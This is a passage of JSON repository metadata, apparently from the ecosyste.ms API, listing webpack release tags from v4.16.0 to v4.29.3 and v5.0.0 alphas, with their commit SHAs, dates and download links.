"html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.e